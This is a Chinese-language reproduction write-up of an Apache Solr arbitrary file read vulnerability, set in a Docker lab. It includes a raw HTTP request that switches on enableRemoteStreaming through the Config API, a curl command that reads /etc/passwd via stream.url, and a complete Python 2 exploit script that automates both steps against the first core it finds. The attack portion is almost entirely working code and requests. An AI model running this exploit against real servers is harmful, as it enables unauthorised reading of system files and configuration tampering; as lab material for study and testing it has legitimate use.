Apache-Solr 任意文件读取漏洞复现
使用Docker
# Pull the image and start the lab container. The tag is unpinned; the paths
# used later (/opt/solr-8.7.0/...) assume the 8.7.0 image.
docker pull solr
# -p 8081:8983 publishes Solr on host port 8081; every request below reaches it
# without any authentication.
docker run --name solr2 -d -p 8081:8983 solr
然后进入容器
# Without copying this configset, creating the new core errors out.
cd /opt/solr-8.7.0/server/solr/configsets/_default
mkdir /var/solr/data/new_core
cp -r conf /var/solr/data/new_core
# Stop the container, then start it again (presumably run from the host;
# a6d76241265f is the container id of the solr2 container).
docker stop a6d76241265f
docker start a6d76241265f
然后进行测试
首先获取core
http://192.168.1.79:8081/solr/admin/cores?indexInfo=false&wt=json
这里可以获取很多核心。我只用new_core 作为测试
POST /solr/new_core/config HTTP/1.1
Host: 192.168.1.79:8081
Content-Length: 80
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Content-Type: application/json
Origin: chrome-extension://ieoejemkppmjcdfbnfphhpbfmallhfnc
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
读取文件（只有在上一步把 enableRemoteStreaming 设为 true 之后，stream.url 指向的文件才会被读取并返回）
# After the Config API change above, debug/dump with param=ContentStreams
# returns the content of the file named by stream.url (here /etc/passwd).
# The response shape is the same one the script below reads ('streams' -> 'stream').
curl "http://192.168.1.79:8081/solr/new_core/debug/dump?param=ContentStreams" -F "stream.url=file:///etc/passwd"
exp:
#!/usr/bin/python
# coding: UTF-8
# Proof-of-concept script for the writeup above. It uses Python 2 syntax
# (`print` statement, `dict.keys()[0]`), matching the shebang.
# Steps mirror the manual ones: list cores, set enableRemoteStreaming through
# the Config API, then ask debug/dump to return the contents of a file:// URL.
# NOTE(review): the Config API change made below is never reverted by this
# script, so a run leaves the first core with remote streaming switched on.
import requests

host="http://192.168.1.79:8081/"
# Strip a trailing slash so the path concatenations below do not double it.
if host[-1]=='/':
    host=host[:-1]

def get_core(host):
    """Run the check against `host`: prints the dump output, or exits with a message."""
    url=host+'/solr/admin/cores?indexInfo=false&wt=json'
    core_data=requests.get(url,timeout=3).json()
    if core_data['status']:
        # Only the first core listed is used.
        core=core_data['status'].keys()[0]
        # Same property as the manual POST above; here the value is the string 'true'.
        jsonp_data={"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":'true'}}
        # Response of this config write is not checked.
        requests.post(url=host+"/solr/%s/config"%core,json=jsonp_data)
        result_data=requests.post(url=host+'/solr/%s/debug/dump?param=ContentStreams'%core,data={"stream.url":"file:///etc/passwd"}).json()
        if result_data['streams']:
            print result_data['streams'][0]['stream']
        else:
            exit("不存在此漏洞")  # message: "this vulnerability is not present"

get_core(host)